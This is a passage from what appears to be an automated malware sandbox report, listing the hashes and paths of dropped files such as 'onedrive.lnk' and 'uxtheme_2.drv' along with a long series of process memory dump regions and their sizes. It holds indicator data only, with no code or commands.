                2f42b24bf5c1dbcc776a98c2f77d5495c42956f82e1cd397693c28e4584e511f

                SHA512

                09cc3e2537839efff9e6233cc3cf3e9b1553412345b023c900775f4b77afd1d7d349f868f9efe3482a8c8c0bf03df8f52ccc6259fc22d98a36fe815da70bb9b9

                Download Submit

              • C:\Users\Admin\AppData\Roaming\update\onedrive.lnk
                Filesize

                1KB

                MD5

                b645868482618c15ed333b39a72ac60e

                SHA1

                f2bf858e0014bc0e1a29ae531cba87f0e5895c5a

                SHA256

                e66e9df50f40aa73dc847f6afdf9852000782841df6b808a75e090e9787604dd

                SHA512

                24ad17f2f9165070f04a9979a804eeac6eb47c10b4f2d79bac4f8f245aee50abea5d3331098119fe1ed10640194d631cbd55cc8f97a55573cbe2c2052fd5fd62

                Download Submit

              • C:\Users\Admin\AppData\Roaming\uxtheme_2.drv
                Filesize

                3.0MB

                MD5

                022a2e01cd6ff624652952cf43b0fe0d

                SHA1

                f3670138ac48304d5ce26202ed51b20ada4f0052

                SHA256

                f4213387bf82edf9929ba45b8c4d6942e99b31b7b3d155f0b7d1d22bffe1d607

                SHA512

                c0ad1737197ce2216287a2d53251048a8cfca7ee67a54f3316b0d7be12728114e2b68e8b92b67eb5b6e3115164a02589c449f4432c1b9a7dc35c2f49d44e6155

                Download Submit

              • memory/628-1167-0x0000000000DF0000-0x000000000127B000-memory.dmp

                Filesize

                4.5MB

                Download

              • memory/628-1169-0x0000000000DF0000-0x000000000127B000-memory.dmp

                Filesize

                4.5MB

                Download

              • memory/672-146-0x0000000000400000-0x000000000052D000-memory.dmp

                Filesize

                1.2MB

                Download

              • memory/948-206-0x00007FF97B090000-0x00007FF97B390000-memory.dmp

                Filesize

                3.0MB

                Download

              • memory/948-766-0x000000001DB10000-0x000000001DC30000-memory.dmp

                Filesize

                1.1MB

                Download

              • memory/948-700-0x000000001CEA0000-0x000000001D1F0000-memory.dmp

                Filesize

                3.3MB

                Download

              • memory/948-197-0x0000000002AB0000-0x0000000002AC0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/980-1075-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-20-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-101-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-61-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-19-0x0000000000A71000-0x0000000000A9F000-memory.dmp

                Filesize

                184KB

                Download

              • memory/980-16-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-668-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-25-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-21-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-1095-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-861-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-24-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-697-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-971-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-196-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-23-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-22-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/980-725-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/1028-1611-0x0000000000840000-0x0000000000CD8000-memory.dmp

                Filesize

                4.6MB

                Download

              • memory/1028-1545-0x0000000000840000-0x0000000000CD8000-memory.dmp

                Filesize

                4.6MB

                Download

              • memory/1160-80-0x0000000000240000-0x000000000087F000-memory.dmp

                Filesize

                6.2MB

                Download

              • memory/1160-178-0x0000000000240000-0x000000000087F000-memory.dmp

                Filesize

                6.2MB

                Download

              • memory/1160-1088-0x0000000000E20000-0x0000000000E7B000-memory.dmp

                Filesize

                364KB

                Download

              • memory/1172-1632-0x0000000000790000-0x0000000000DFE000-memory.dmp

                Filesize

                6.4MB

                Download

              • memory/1172-1630-0x0000000000790000-0x0000000000DFE000-memory.dmp

                Filesize

                6.4MB

                Download

              • memory/1256-692-0x00000172CEED0000-0x00000172CF0EC000-memory.dmp

                Filesize

                2.1MB

                Download

              • memory/1480-176-0x000002741D680000-0x000002741D89C000-memory.dmp

                Filesize

                2.1MB

                Download

              • memory/1480-849-0x0000000000400000-0x0000000000422000-memory.dmp

                Filesize

                136KB

                Download

              • memory/1480-850-0x0000000000400000-0x0000000000422000-memory.dmp

                Filesize

                136KB

                Download

              • memory/1480-852-0x0000000000400000-0x0000000000422000-memory.dmp

                Filesize

                136KB

                Download

              • memory/1920-1077-0x0000000011000000-0x0000000011B4F000-memory.dmp

                Filesize

                11.3MB

                Download

              • memory/1920-1078-0x0000000011000000-0x0000000011B4F000-memory.dmp

                Filesize

                11.3MB

                Download

              • memory/1920-1074-0x0000000011000000-0x0000000011B4F000-memory.dmp

                Filesize

                11.3MB

                Download

              • memory/1920-1079-0x0000000011000000-0x0000000011B4F000-memory.dmp

                Filesize

                11.3MB

                Download

              • memory/1920-1094-0x0000000011000000-0x0000000011B4F000-memory.dmp

                Filesize

                11.3MB

                Download

              • memory/1920-1076-0x0000000011000000-0x0000000011B4F000-memory.dmp

                Filesize

                11.3MB

                Download

              • memory/1920-1093-0x0000000011000000-0x0000000011B4F000-memory.dmp

                Filesize

                11.3MB

                Download

              • memory/2440-928-0x0000000005F10000-0x0000000005F5C000-memory.dmp

                Filesize

                304KB

                Download

              • memory/2440-926-0x0000000005850000-0x0000000005BA4000-memory.dmp

                Filesize

                3.3MB

                Download

              • memory/2732-148-0x0000000000400000-0x0000000000432000-memory.dmp

                Filesize

                200KB

                Download

              • memory/2732-120-0x0000000000400000-0x0000000000432000-memory.dmp

                Filesize

                200KB

                Download

              • memory/2776-60-0x0000000000190000-0x000000000062E000-memory.dmp

                Filesize

                4.6MB

                Download

              • memory/2776-59-0x0000000000190000-0x000000000062E000-memory.dmp

                Filesize

                4.6MB

                Download

              • memory/3004-4-0x0000000000340000-0x00000000007FA000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/3004-3-0x0000000000340000-0x00000000007FA000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/3004-2-0x0000000000341000-0x000000000036F000-memory.dmp

                Filesize

                184KB

                Download

              • memory/3004-0-0x0000000000340000-0x00000000007FA000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/3004-18-0x0000000000340000-0x00000000007FA000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/3004-1-0x0000000077254000-0x0000000077256000-memory.dmp

                Filesize

                8KB

                Download

              • memory/3272-833-0x00000000000E0000-0x0000000000440000-memory.dmp

                Filesize

                3.4MB

                Download

              • memory/3512-972-0x0000000006D70000-0x0000000006DE6000-memory.dmp

                Filesize

                472KB

                Download

              • memory/3512-156-0x000002A71EE30000-0x000002A71EE52000-memory.dmp

                Filesize

                136KB

                Download

              • memory/3512-914-0x0000000000F90000-0x0000000000FA2000-memory.dmp

                Filesize

                72KB

                Download

              • memory/3512-1084-0x0000000007350000-0x0000000007390000-memory.dmp

                Filesize

                256KB

                Download

              • memory/3512-1085-0x00000000072D0000-0x00000000072DA000-memory.dmp

                Filesize

                40KB

                Download

              • memory/3512-960-0x0000000005B70000-0x0000000005C0C000-memory.dmp

                Filesize

                624KB

                Download

              • memory/3512-1083-0x00000000072C0000-0x00000000072C8000-memory.dmp

                Filesize

                32KB

                Download

              • memory/3512-973-0x0000000006CF0000-0x0000000006D52000-memory.dmp

                Filesize

                392KB

                Download

              • memory/3512-1082-0x00000000071E0000-0x000000000727C000-memory.dmp

                Filesize

                624KB

                Download

              • memory/3512-974-0x0000000006E40000-0x0000000006E5E000-memory.dmp

                Filesize

                120KB

                Download

              • memory/3532-970-0x0000000005F50000-0x0000000005F9C000-memory.dmp

                Filesize

                304KB

                Download

              • memory/3540-735-0x000002584BBC0000-0x000002584BBD8000-memory.dmp

                Filesize

                96KB

                Download

              • memory/3540-696-0x0000025864320000-0x000002586453C000-memory.dmp

                Filesize

                2.1MB

                Download

              • memory/3732-862-0x0000000000E50000-0x0000000001307000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/3732-99-0x0000000000400000-0x0000000000432000-memory.dmp

                Filesize

                200KB

                Download

              • memory/3732-124-0x0000000000400000-0x0000000000432000-memory.dmp

                Filesize

                200KB

                Download

              • memory/3732-949-0x0000000000E50000-0x0000000001307000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/3736-1081-0x00007FF97B090000-0x00007FF97B390000-memory.dmp

                Filesize

                3.0MB

                Download

              • memory/3740-819-0x0000000005690000-0x00000000056B2000-memory.dmp

                Filesize

                136KB

                Download

              • memory/3740-783-0x0000000005080000-0x00000000050B6000-memory.dmp

                Filesize

                216KB

                Download

              • memory/3740-839-0x0000000007F80000-0x00000000085FA000-memory.dmp

                Filesize

                6.5MB

                Download

              • memory/3740-838-0x0000000006680000-0x00000000066CC000-memory.dmp

                Filesize

                304KB

                Download

              • memory/3740-837-0x0000000006650000-0x000000000666E000-memory.dmp

                Filesize

                120KB

                Download

              • memory/3740-793-0x0000000005750000-0x0000000005D78000-memory.dmp

                Filesize

                6.2MB

                Download

              • memory/3740-877-0x0000000007AE0000-0x0000000007B76000-memory.dmp

                Filesize

                600KB

                Download

              • memory/3740-822-0x0000000006050000-0x00000000063A4000-memory.dmp

                Filesize

                3.3MB

                Download

              • memory/3740-820-0x0000000005E70000-0x0000000005ED6000-memory.dmp

                Filesize

                408KB

                Download

              • memory/3740-821-0x0000000005FE0000-0x0000000006046000-memory.dmp

                Filesize

                408KB

                Download

              • memory/3740-840-0x0000000006B50000-0x0000000006B6A000-memory.dmp

                Filesize

                104KB

                Download

              • memory/3740-878-0x0000000007A80000-0x0000000007AA2000-memory.dmp

                Filesize

                136KB

                Download

              • memory/3740-881-0x0000000008BB0000-0x0000000009154000-memory.dmp

                Filesize

                5.6MB

                Download

              • memory/3788-548-0x0000000000400000-0x0000000000459000-memory.dmp

                Filesize

                356KB

                Download

              • memory/3788-600-0x0000000000400000-0x0000000000459000-memory.dmp

                Filesize

                356KB

                Download

              • memory/3832-1131-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/3832-1129-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/4016-706-0x0000000000400000-0x0000000000459000-memory.dmp

                Filesize

                356KB

                Download

              • memory/4028-915-0x0000000000860000-0x0000000000B10000-memory.dmp

                Filesize

                2.7MB

                Download

              • memory/4028-990-0x0000000000860000-0x0000000000B10000-memory.dmp

                Filesize

                2.7MB

                Download

              • memory/4028-916-0x0000000000860000-0x0000000000B10000-memory.dmp

                Filesize

                2.7MB

                Download

              • memory/4028-910-0x0000000000860000-0x0000000000B10000-memory.dmp

                Filesize

                2.7MB

                Download

              • memory/4028-983-0x0000000000860000-0x0000000000B10000-memory.dmp

                Filesize

                2.7MB

                Download

              • memory/4288-1147-0x00000000009C0000-0x0000000000E4F000-memory.dmp

                Filesize

                4.6MB

                Download

              • memory/4288-1150-0x00000000009C0000-0x0000000000E4F000-memory.dmp

                Filesize

                4.6MB

                Download

              • memory/4360-1087-0x0000000000FA0000-0x0000000001CCE000-memory.dmp

                Filesize

                13.2MB

                Download

              • memory/4360-1013-0x0000000000FA0000-0x0000000001CCE000-memory.dmp

                Filesize

                13.2MB

                Download

              • memory/4360-1539-0x0000000000FA0000-0x0000000001CCE000-memory.dmp

                Filesize

                13.2MB

                Download

              • memory/4444-729-0x0000000000DD0000-0x0000000000EA9000-memory.dmp

                Filesize

                868KB

                Download

              • memory/4444-835-0x0000000000DD0000-0x0000000000EA9000-memory.dmp

                Filesize

                868KB

                Download

              • memory/4644-984-0x0000000000BF0000-0x00000000010AD000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/4644-986-0x0000000000BF0000-0x00000000010AD000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/4960-693-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/4960-695-0x0000000000A70000-0x0000000000F2A000-memory.dmp

                Filesize

                4.7MB

                Download

              • memory/4976-123-0x0000000000400000-0x000000000052D000-memory.dmp

                Filesize

                1.2MB

                Download